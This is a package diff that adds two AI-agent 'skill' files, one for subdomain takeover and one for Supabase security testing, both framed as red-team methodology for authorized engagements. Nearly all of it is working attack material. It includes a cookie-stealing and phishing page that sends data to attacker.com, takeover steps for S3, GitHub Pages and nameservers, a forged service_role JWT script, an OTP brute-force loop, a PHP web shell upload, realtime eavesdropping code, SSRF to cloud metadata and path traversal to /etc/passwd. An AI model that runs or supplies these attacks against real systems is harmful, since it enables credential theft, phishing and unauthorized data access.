rtexit-method 0.1.9 → 0.1.11

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rtexit-method",
-  "version": "0.1.9",
+  "version": "0.1.11",
   "description": "RTExit - AI-assisted Red Team methodology installer",
   "license": "MIT",
   "author": "Exit Code",

package/packaged-assets/.agents/skills/rt-subdomain-takeover/SKILL.md

@@ -0,0 +1,307 @@
+---
+name: rt-subdomain-takeover
+description: "Subdomain takeover skill for authorized engagements. Identifying dangling CNAME records pointing to unclaimed services, takeover on GitHub Pages, Heroku, AWS S3, Azure, Netlify, Fastly, Shopify, and 50+ other platforms, DNS hijacking via expired domains, NS takeover for full zone control, automated scanning with Subzy and Nuclei, and impact demonstration via cookie theft and phishing. Use after subdomain enumeration to identify high-impact unclaimed subdomains."
+---
+
+# rt-subdomain-takeover — Subdomain Takeover
+
+## Overview
+
+Subdomain takeover occurs when a subdomain has a CNAME record pointing to an external service that no longer exists or is unclaimed. An attacker claims that service, hosts malicious content under the company's subdomain, and can steal cookies, run phishing, bypass CSP, or conduct further attacks under a trusted domain.
+
+**Impact:**
+- Serve malicious content under `trusted-corp.com` subdomain
+- Steal cookies scoped to `.corp.com` (if HttpOnly not set)
+- Bypass CSP (content served from trusted origin)
+- Send phishing emails from `mail.corp.com`
+- Full zone control if NS record is dangling
+
+---
+
+## Phase 1 — Discovery
+
+```bash
+# Step 1: Enumerate all subdomains (feed from rt-subdomain-enum output)
+subfinder -d corp.com -all -silent | tee subs.txt
+amass enum -passive -d corp.com -o subs-amass.txt
+cat subs*.txt | sort -u > all-subs.txt
+
+# Step 2: Check CNAME records for each subdomain
+while read sub; do
+    cname=$(dig CNAME +short $sub)
+    if [ -n "$cname" ]; then
+        echo "$sub → $cname"
+    fi
+done < all-subs.txt | tee cname-map.txt
+
+# Step 3: Check if CNAME target exists / is claimed
+while IFS=' → ' read sub cname; do
+    # Check if CNAME target resolves
+    if ! dig +short $cname | grep -q '[0-9]'; then
+        echo "[DANGLING] $sub → $cname"
+    fi
+done < cname-map.txt
+
+# Step 4: Check for NXDOMAIN (subdomain exists in DNS but CNAME target gone)
+while read sub; do
+    result=$(dig +short $sub)
+    if [ -z "$result" ]; then
+        # Check if there's a CNAME that leads nowhere
+        cname=$(dig CNAME +short $sub 2>/dev/null)
+        [ -n "$cname" ] && echo "[CANDIDATE] $sub → $cname"
+    fi
+done < all-subs.txt
+```
+
+---
+
+## Phase 2 — Automated Scanning
+
+```bash
+# Subzy — dedicated subdomain takeover scanner
+go install github.com/LukaSikic/subzy@latest
+subzy run --targets all-subs.txt
+# Checks against 50+ fingerprints for vulnerable services
+
+# Nuclei — subdomain takeover templates
+nuclei -l all-subs.txt -t ~/nuclei-templates/http/takeovers/
+# Covers: GitHub Pages, Heroku, AWS S3, Azure, Netlify, Fastly, etc.
+
+# subjack
+go install github.com/haccer/subjack@latest
+subjack -w all-subs.txt -t 100 -timeout 30 -o results.txt -ssl
+
+# Can-I-Take-Over-XYZ (reference list)
+# https://github.com/EdOverflow/can-i-take-over-xyz
+# Lists fingerprints and claimable status per service
+
+# Manual check: visit subdomains with Burp + look for:
+# "NoSuchBucket" = S3 takeover
+# "There is no app here" = Heroku takeover
+# "404 Not Found" on GitHub Pages
+# "Fastly error: 404 Unknown" = Fastly takeover
+# "azure websites" errors = Azure App Service
+```
+
+---
+
+## Phase 3 — Service-Specific Takeovers
+
+### GitHub Pages
+
+```bash
+# Fingerprint: "There isn't a GitHub Pages site here"
+# Check: dig CNAME sub.corp.com → corp-org.github.io
+
+# Takeover:
+# 1. Create GitHub account / org matching the CNAME
+# 2. Create repo: corp-org/corp-org.github.io
+# 3. Enable GitHub Pages
+# 4. Add CNAME file: echo "sub.corp.com" > CNAME
+# 5. sub.corp.com now serves your content
+
+# Or if CNAME points to username.github.io:
+# 1. Register GitHub username: corp-username
+# 2. Create repo: corp-username.github.io
+# 3. sub.corp.com → your repo
+```
+
+### AWS S3
+
+```bash
+# Fingerprint: "NoSuchBucket" or "The specified bucket does not exist"
+# Check: dig CNAME sub.corp.com → sub.corp.com.s3.amazonaws.com
+#        or: sub.corp.com.s3-website-us-east-1.amazonaws.com
+
+# Takeover:
+aws s3 mb s3://sub.corp.com --region us-east-1
+# Bucket name must EXACTLY match the subdomain
+aws s3 website s3://sub.corp.com/ \
+  --index-document index.html \
+  --error-document error.html
+
+# Upload malicious content
+echo '<script>document.location="https://attacker.com?c="+document.cookie</script>' \
+  > index.html
+aws s3 cp index.html s3://sub.corp.com/
+
+# sub.corp.com now serves your page under corp.com's domain
+```
+
+### Heroku
+
+```bash
+# Fingerprint: "No such app" or "herokuapps.com" CNAME
+# CNAME: sub.corp.com → random-name-12345.herokudns.com
+
+# Takeover:
+heroku create random-name-12345
+heroku domains:add sub.corp.com --app random-name-12345
+# Deploy app to random-name-12345
+# sub.corp.com → your Heroku app
+```
+
+### Azure App Service
+
+```bash
+# Fingerprint: "Microsoft Azure App Service" 404
+# CNAME: sub.corp.com → corp-app.azurewebsites.net
+
+# Takeover:
+az webapp create --name corp-app \
+  --resource-group myRG \
+  --plan myPlan
+az webapp config hostname add \
+  --webapp-name corp-app \
+  --resource-group myRG \
+  --hostname sub.corp.com
+```
+
+### Netlify
+
+```bash
+# Fingerprint: "Not found - Request ID"
+# CNAME: sub.corp.com → corp.netlify.app
+
+# Takeover:
+# 1. Create Netlify site → site settings → domain management
+# 2. Add custom domain: sub.corp.com
+# 3. Deploy malicious site
+netlify deploy --prod
+```
+
+### Fastly
+
+```bash
+# Fingerprint: "Fastly error: 404 Unfound" or "Unknown domain"
+# CNAME: sub.corp.com → something.fastly.net
+
+# Takeover:
+# Create Fastly service → add domain: sub.corp.com
+# sub.corp.com now served by your Fastly service
+```
+
+---
+
+## Phase 4 — NS Record Takeover (Critical)
+
+```bash
+# If subdomain.corp.com has NS records pointing to expired/unclaimed nameservers
+# → attacker claims the nameservers → full DNS control for that subdomain
+
+# Check NS records
+dig NS sub.corp.com
+# ns1.expired-dns-provider.com
+# ns2.expired-dns-provider.com
+
+# Check if provider is still active
+whois expired-dns-provider.com | grep -i "expir"
+# If expired/available → register it → control all DNS for sub.corp.com
+
+# Once you control NS:
+# → Create A records → point to attacker server
+# → Create MX records → intercept email to @sub.corp.com
+# → Create any record → full subdomain zone control
+```
+
+---
+
+## Phase 5 — Impact Demonstration
+
+```bash
+# Cookie theft (demonstrate scope)
+# If corp.com sets cookies with Domain=.corp.com:
+# sub.corp.com can read those cookies!
+
+# Host on claimed subdomain:
+cat > index.html << 'EOF'
+<html>
+<script>
+// Steal .corp.com scoped cookies
+var stolen = document.cookie;
+fetch('https://attacker.com/log?cookies=' + encodeURIComponent(stolen));
+
+// Demonstrate phishing capability
+document.write('<h1>Corp.com Login Portal</h1>');
+document.write('<form action="https://attacker.com/collect" method="POST">');
+document.write('<input name="user" placeholder="Username"><br>');
+document.write('<input name="pass" type="password" placeholder="Password"><br>');
+document.write('<button>Login</button></form>');
+</script>
+</html>
+EOF
+
+# CSP bypass: if corp.com has CSP: script-src *.corp.com
+# Loading scripts from sub.corp.com bypasses CSP completely
+# <script src="https://sub.corp.com/evil.js"></script>  ← allowed by CSP!
+```
+
+---
+
+## Phase 6 — Evidence Documentation
+
+```bash
+# Screenshot the takeover proof
+# Show: sub.corp.com serving your content
+
+# curl to confirm
+curl -I https://sub.corp.com
+# Server: your-server
+# Content shows attacker-controlled content
+
+# Document CNAME chain
+dig CNAME +trace sub.corp.com
+
+# Finding template:
+# Title: Subdomain Takeover — sub.corp.com
+# Severity: HIGH (cookie theft possible) / MEDIUM (content injection)
+# CVSS: 8.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) if cookie theft
+# Evidence: screenshot + curl output + CNAME chain
+# Impact: phishing under trusted domain, cookie theft, CSP bypass
+# Remediation: remove dangling DNS record OR re-claim the service
+```
+
+---
+
+## Most Vulnerable Services (Quick Reference)
+
+```
+Service               Fingerprint                              Claimable
+─────────────────────────────────────────────────────────────────────────
+GitHub Pages          "There isn't a GitHub Pages site here"  ✅ Yes
+AWS S3                "NoSuchBucket"                          ✅ Yes
+Heroku                "No such app"                           ✅ Yes
+Azure App Service     Azure 404 page                          ✅ Yes
+Netlify               "Not found - Request ID"                ✅ Yes
+Fastly                "Fastly error: 404 Unfound"             ✅ Yes
+Shopify               "Sorry, this shop is currently..."      ✅ Yes
+Tumblr                "There's nothing here"                  ✅ Yes
+WordPress.com         "Do you want to register..."            ✅ Yes
+Ghost                 "The thing you were looking for..."     ✅ Yes
+Surge.sh              "project not found"                     ✅ Yes
+Bitbucket             "Repository not found"                  ✅ Yes
+Zendesk               "Help Center Closed"                    ✅ Yes
+Freshdesk             "We could not find what..."             ⚠️  Limited
+Desk.com (Salesforce) "Please try again"                      ✅ Yes
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** subfinder + subzy automated scan → identify candidates → manual verification
+
+**INTERMEDIATE:** GitHub Pages / S3 takeover PoC → cookie theft demonstration
+
+**ADVANCED:** NS takeover → full zone control → MX takeover for email interception
+
+**EXPERT:** Chained attack: takeover → CSP bypass → XSS on main domain → account takeover
+
+---
+
+## References
+
+- Can-I-Take-Over-XYZ: https://github.com/EdOverflow/can-i-take-over-xyz
+- Subzy: https://github.com/LukaSikic/subzy
+- Nuclei takeover templates: https://github.com/projectdiscovery/nuclei-templates
+- MITRE T1584.001: https://attack.mitre.org/techniques/T1584/001/

package/packaged-assets/.agents/skills/rt-supabase/SKILL.md

@@ -0,0 +1,402 @@
+---
+name: rt-supabase
+description: "Supabase security testing skill for authorized engagements. Row-Level Security (RLS) policy bypass, anon key abuse for unauthorized data access, service role key exposure, PostgREST API horizontal privilege escalation, JWT manipulation for role escalation, schema disclosure via introspection, Supabase Storage bucket misconfiguration, Realtime channel eavesdropping, Edge Function exploitation, and auth bypass techniques. Use when engagement scope includes Supabase-backed applications."
+---
+
+# rt-supabase — Supabase Security Testing
+
+## Overview
+
+Supabase is an open-source Firebase alternative built on PostgreSQL, PostgREST, GoTrue auth, and Realtime. Its architecture creates unique attack surfaces: the `anon` key is intentionally public but often misconfigured, RLS policies have logical gaps, and the PostgREST API exposes the entire database schema by default. A single misconfiguration can expose all user data.
+
+**Attack surfaces:**
+- PostgREST REST API (direct DB access)
+- Row-Level Security (RLS) policy bypass
+- JWT role escalation (anon → authenticated → service_role)
+- Supabase Storage (public/private buckets)
+- Realtime subscriptions (unauthorized channel access)
+- Edge Functions (serverless function exploitation)
+- Auth endpoints (GoTrue authentication bypass)
+
+---
+
+## Phase 1 — Discovery & Enumeration
+
+```bash
+# Supabase URL pattern: https://PROJECT_ID.supabase.co
+# Find project ID from source code, network requests, JS bundles
+
+# Fingerprint Supabase
+curl -I https://PROJECT_ID.supabase.co/rest/v1/
+# Returns: X-Powered-By: PostgREST
+
+# Extract anon key from JS bundle (it's meant to be public but often over-privileged)
+grep -r "supabaseKey\|SUPABASE_ANON_KEY\|supabase_anon_key\|eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" \
+  ./js_files/
+
+# Anon key is a JWT — decode to understand permissions
+echo "ANON_KEY" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
+# Payload: {"role": "anon", "iss": "supabase", ...}
+
+# Discover all exposed tables via PostgREST introspection
+curl "https://PROJECT_ID.supabase.co/rest/v1/" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer ANON_KEY"
+# Returns: OpenAPI spec listing ALL tables and their columns
+
+# Or via OPTIONS request
+curl -X OPTIONS "https://PROJECT_ID.supabase.co/rest/v1/" \
+  -H "apikey: ANON_KEY" | python3 -m json.tool
+```
+
+---
+
+## Phase 2 — RLS Bypass Techniques
+
+```bash
+# RLS (Row-Level Security) controls which rows each user can access
+# Misconfigured RLS = read/write other users' data
+
+# Test 1: Table with no RLS at all
+curl "https://PROJECT_ID.supabase.co/rest/v1/users" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer ANON_KEY"
+# If returns all users → RLS not enabled on this table
+
+# Test 2: RLS enabled but policy is too permissive
+# Common bad policy: "FOR SELECT USING (true)" = everyone can read everything
+curl "https://PROJECT_ID.supabase.co/rest/v1/profiles?select=*" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer ANON_KEY"
+
+# Test 3: RLS policy checks auth.uid() but not properly
+# Log in as User A → try to access User B's data by manipulating filters
+TOKEN_A="JWT_OF_USER_A"
+# Normal: /rest/v1/orders?user_id=eq.USER_A_ID  → returns A's orders
+# Attack: /rest/v1/orders?user_id=eq.USER_B_ID  → should be blocked by RLS
+curl "https://PROJECT_ID.supabase.co/rest/v1/orders?user_id=eq.USER_B_ID" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer $TOKEN_A"
+# If returns B's orders → IDOR via RLS bypass
+
+# Test 4: RLS on main table but not on joined/related tables
+curl "https://PROJECT_ID.supabase.co/rest/v1/orders?select=*,user_profiles(*)" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer $TOKEN_A"
+# user_profiles may not have RLS → exposed via JOIN
+
+# Test 5: RLS bypass via Postgres functions (SECURITY DEFINER)
+# Functions marked SECURITY DEFINER run as function owner, bypass RLS
+# Find exposed RPC endpoints:
+curl "https://PROJECT_ID.supabase.co/rest/v1/rpc/" \
+  -H "apikey: ANON_KEY"
+# Call functions that might bypass RLS
+curl -X POST "https://PROJECT_ID.supabase.co/rest/v1/rpc/get_all_users" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer ANON_KEY" \
+  -H "Content-Type: application/json" \
+  -d '{}'
+```
+
+---
+
+## Phase 3 — JWT Role Escalation
+
+```bash
+# Supabase JWT roles: anon < authenticated < service_role
+# service_role bypasses ALL RLS — full database access
+
+# Step 1: Find the JWT secret
+# Secret is used to sign tokens — if weak or leaked → forge tokens
+# Check: source code, .env files, GitHub repos
+grep -r "SUPABASE_JWT_SECRET\|jwt_secret\|JWT_SECRET" . --include="*.env*"
+trufflehog github --org=TARGET_ORG | grep -i "supabase\|jwt"
+
+# Step 2: Forge service_role JWT (if secret known)
+python3 << 'EOF'
+import jwt, time
+
+# If you found the JWT secret
+secret = "FOUND_JWT_SECRET"
+
+# Forge service_role token
+payload = {
+    "iss": "supabase",
+    "ref": "PROJECT_ID",
+    "role": "service_role",
+    "iat": int(time.time()),
+    "exp": int(time.time()) + 86400
+}
+token = jwt.encode(payload, secret, algorithm="HS256")
+print(f"service_role token: {token}")
+EOF
+
+# Step 3: Use service_role token → bypasses all RLS
+curl "https://PROJECT_ID.supabase.co/rest/v1/users?select=*" \
+  -H "apikey: FORGED_SERVICE_ROLE_TOKEN" \
+  -H "Authorization: Bearer FORGED_SERVICE_ROLE_TOKEN"
+# Returns ALL users with no RLS filtering
+
+# Step 4: Role claim manipulation in user JWT
+# If app doesn't validate role claim server-side:
+python3 << 'EOF'
+import jwt, time
+
+# Take existing anon token and modify role
+# (Only works if secret is known or JWT not properly verified)
+secret = "FOUND_SECRET"
+payload = {
+    "iss": "supabase",
+    "ref": "PROJECT_ID",
+    "role": "authenticated",  # Upgrade from anon
+    "sub": "00000000-0000-0000-0000-000000000001",  # admin user UUID
+    "email": "admin@corp.com",
+    "iat": int(time.time()),
+    "exp": int(time.time()) + 86400
+}
+token = jwt.encode(payload, secret, algorithm="HS256")
+print(token)
+EOF
+```
+
+---
+
+## Phase 4 — PostgREST API Exploitation
+
+```bash
+# PostgREST exposes full CRUD on all tables (subject to RLS)
+# Test all HTTP methods
+
+# Read all data
+curl "https://PROJECT_ID.supabase.co/rest/v1/TABLE_NAME?select=*" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer USER_TOKEN"
+
+# Write / create records (if INSERT policy misconfigured)
+curl -X POST "https://PROJECT_ID.supabase.co/rest/v1/TABLE_NAME" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer USER_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"user_id": "OTHER_USER_UUID", "data": "injected"}'
+
+# Update other users' records (if UPDATE policy misconfigured)
+curl -X PATCH "https://PROJECT_ID.supabase.co/rest/v1/profiles?id=eq.OTHER_USER_ID" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer MY_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"role": "admin"}'
+
+# Delete records
+curl -X DELETE "https://PROJECT_ID.supabase.co/rest/v1/TABLE?id=eq.VICTIM_ID" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer MY_TOKEN"
+
+# PostgREST column selection — try to access hidden columns
+curl "https://PROJECT_ID.supabase.co/rest/v1/users?select=id,email,password,raw_user_meta_data" \
+  -H "apikey: ANON_KEY"
+
+# Filter bypass — access all rows
+curl "https://PROJECT_ID.supabase.co/rest/v1/TABLE?select=*&limit=1000" \
+  -H "apikey: ANON_KEY"
+
+# Full-text search for sensitive data
+curl "https://PROJECT_ID.supabase.co/rest/v1/TABLE?content=fts.password" \
+  -H "apikey: ANON_KEY"
+```
+
+---
+
+## Phase 5 — Storage Bucket Attacks
+
+```bash
+# Supabase Storage: S3-compatible object storage
+# Buckets can be public or private (private requires RLS)
+
+# List all buckets
+curl "https://PROJECT_ID.supabase.co/storage/v1/bucket" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer ANON_KEY"
+
+# List files in a bucket
+curl "https://PROJECT_ID.supabase.co/storage/v1/object/list/BUCKET_NAME" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer ANON_KEY" \
+  -H "Content-Type: application/json" \
+  -d '{"prefix": "", "limit": 100}'
+
+# Download files from public bucket (no auth needed)
+curl "https://PROJECT_ID.supabase.co/storage/v1/object/public/BUCKET/file.pdf"
+
+# Download from private bucket (if RLS misconfigured)
+curl "https://PROJECT_ID.supabase.co/storage/v1/object/authenticated/BUCKET/private.pdf" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer ANON_KEY"
+
+# Path traversal in storage
+curl "https://PROJECT_ID.supabase.co/storage/v1/object/public/BUCKET/../../../etc/passwd"
+
+# Upload to bucket (if insert policy open)
+curl -X POST "https://PROJECT_ID.supabase.co/storage/v1/object/BUCKET/shell.php" \
+  -H "apikey: ANON_KEY" \
+  -H "Authorization: Bearer USER_TOKEN" \
+  -H "Content-Type: application/octet-stream" \
+  --data-binary "<?php system(\$_GET['c']); ?>"
+```
+
+---
+
+## Phase 6 — Auth Bypass (GoTrue)
+
+```bash
+# GoTrue handles Supabase authentication
+# Test for auth vulnerabilities
+
+# User enumeration via password reset
+curl -X POST "https://PROJECT_ID.supabase.co/auth/v1/recover" \
+  -H "apikey: ANON_KEY" \
+  -H "Content-Type: application/json" \
+  -d '{"email": "victim@corp.com"}'
+# Different response for existing vs non-existing email = enumeration
+
+# Sign up with existing email (check error message)
+curl -X POST "https://PROJECT_ID.supabase.co/auth/v1/signup" \
+  -H "apikey: ANON_KEY" \
+  -H "Content-Type: application/json" \
+  -d '{"email": "admin@corp.com", "password": "test123"}'
+
+# OTP brute force (if rate limiting weak)
+for code in $(seq -w 000000 999999); do
+  r=$(curl -s -X POST "https://PROJECT_ID.supabase.co/auth/v1/verify" \
+    -H "apikey: ANON_KEY" \
+    -H "Content-Type: application/json" \
+    -d "{\"type\":\"recovery\",\"token\":\"$code\",\"email\":\"victim@corp.com\"}")
+  echo "$code: $r" | grep -v "Token has expired"
+done
+
+# OAuth provider misconfiguration
+# Check which providers are enabled
+curl "https://PROJECT_ID.supabase.co/auth/v1/settings" \
+  -H "apikey: ANON_KEY"
+
+# Admin API (requires service_role)
+curl "https://PROJECT_ID.supabase.co/auth/v1/admin/users" \
+  -H "apikey: SERVICE_ROLE_KEY"  # If service_role key found → dump all users
+```
+
+---
+
+## Phase 7 — Realtime Channel Eavesdropping
+
+```javascript
+// Supabase Realtime: WebSocket-based live data
+// If channel doesn't check auth → any user can subscribe to any table changes
+
+const { createClient } = require('@supabase/supabase-js')
+
+const supabase = createClient(
+  'https://PROJECT_ID.supabase.co',
+  'ANON_KEY'  // Use anon key (unauthenticated)
+)
+
+// Subscribe to ALL changes on sensitive tables
+const channel = supabase
+  .channel('all-changes')
+  .on('postgres_changes',
+    { event: '*', schema: 'public', table: 'orders' },
+    (payload) => {
+      console.log('Intercepted:', payload)
+      // Receives: INSERT/UPDATE/DELETE events with full row data
+    }
+  )
+  .subscribe()
+
+// Try different tables
+const tables = ['users', 'profiles', 'messages', 'payments', 'orders']
+tables.forEach(table => {
+  supabase.channel(`spy-${table}`)
+    .on('postgres_changes', { event: '*', schema: 'public', table }, 
+        payload => console.log(`${table}:`, payload))
+    .subscribe()
+})
+```
+
+---
+
+## Phase 8 — Edge Function Exploitation
+
+```bash
+# Supabase Edge Functions = Deno-based serverless functions
+# Endpoint: https://PROJECT_ID.supabase.co/functions/v1/FUNCTION_NAME
+
+# Enumerate functions (often discoverable from source code)
+curl "https://PROJECT_ID.supabase.co/functions/v1/" \
+  -H "Authorization: Bearer ANON_KEY"
+
+# Test without auth
+curl "https://PROJECT_ID.supabase.co/functions/v1/admin-action"
+
+# Test with anon key only
+curl "https://PROJECT_ID.supabase.co/functions/v1/process-payment" \
+  -H "Authorization: Bearer ANON_KEY" \
+  -H "Content-Type: application/json" \
+  -d '{"amount": -100}'  # Negative amount
+
+# SSRF via Edge Function
+curl -X POST "https://PROJECT_ID.supabase.co/functions/v1/fetch-url" \
+  -H "Authorization: Bearer ANON_KEY" \
+  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'
+
+# Inject env variables via function input (if poorly sandboxed)
+curl -X POST "https://PROJECT_ID.supabase.co/functions/v1/send-email" \
+  -d '{"to": "attacker@evil.com", "template": "../../service_role_key"}'
+```
+
+---
+
+## Finding Documentation
+
+```
+Finding: Supabase RLS Bypass — Unauthorized Data Access
+Severity: CRITICAL
+CVSS: 9.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
+CWE: CWE-284 (Improper Access Control)
+
+Evidence:
+- curl command showing access to other users' records
+- Number of records accessible (e.g., "returned 15,234 user records")
+- Screenshot of sensitive data returned
+
+Impact:
+- Full read/write access to all user data
+- PII exposure (emails, addresses, payment info)
+- Account takeover via profile modification
+
+Remediation:
+1. Enable RLS on ALL tables: ALTER TABLE name ENABLE ROW LEVEL SECURITY
+2. Create proper policies: CREATE POLICY "users_own_data" ON table 
+   FOR ALL USING (auth.uid() = user_id)
+3. Never expose service_role key client-side
+4. Audit all SECURITY DEFINER functions
+5. Enable storage bucket RLS policies
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** anon key extraction → table enumeration via OpenAPI → test for missing RLS
+
+**INTERMEDIATE:** RLS bypass via IDOR filters · Storage bucket misconfiguration · Auth user enumeration
+
+**ADVANCED:** JWT secret extraction → service_role token forgery → full RLS bypass · Realtime eavesdropping
+
+**EXPERT:** SECURITY DEFINER function abuse · Edge Function SSRF · Realtime + RLS chain for persistent access
+
+---
+
+## References
+
+- Supabase Security Guide: https://supabase.com/docs/guides/auth/row-level-security
+- PostgREST docs: https://postgrest.org/en/stable/
+- HackerOne Supabase reports: https://hackerone.com/supabase
+- MITRE T1213: https://attack.mitre.org/techniques/T1213/